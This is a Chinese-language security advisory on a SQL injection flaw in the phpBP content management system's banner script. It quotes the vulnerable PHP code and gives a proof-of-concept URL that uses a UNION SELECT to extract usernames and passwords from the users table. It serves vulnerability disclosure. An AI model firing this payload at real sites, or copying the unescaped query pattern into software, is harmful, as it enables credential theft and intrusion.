phpBP id参数远程SQL注入漏洞
发布日期:2008-03-17
更新日期:2008-03-18
受影响系统:PHP BP Team phpBP
描述:
BUGTRAQ ID:
28272
PHPBP是在波兰广泛使用的网站内容管理系统。
PHPBP的includes/functions/banners-external.php脚本文件中没有正确地验证对id参数的输入,允许远程攻击者通过提交特制的SQL查询请求执行SQL注入攻击。
以下是有漏洞的代码段:
...
3 function banner_out() //zlicza ilosc klikniec na banner
4 {
5 global $conf;
6
7 if($_GET['id'])
8 {
9 SQLvalidate($_POST['id']);
10
11 $db = new dbquery;
12 $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);
13
14 if($db->num_rows()==0)
15 {
16 redirect('index.php?module=error?error=banners_error2');
17 exit;
18 }
19
20 $d=$db->fetch_object();
21 $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);
22
23 redirect($d->url);
24 }
25
26 exit;
27 }
...
<*来源:irk4z (
irk4z@yahoo.pl)
链接:
http://secunia.com/advisories/29411/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*
建议:
厂商补丁:
PHP BP Team
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpbp.com/index.php?module=download浏览次数:4491
严重程度:0(网友投票)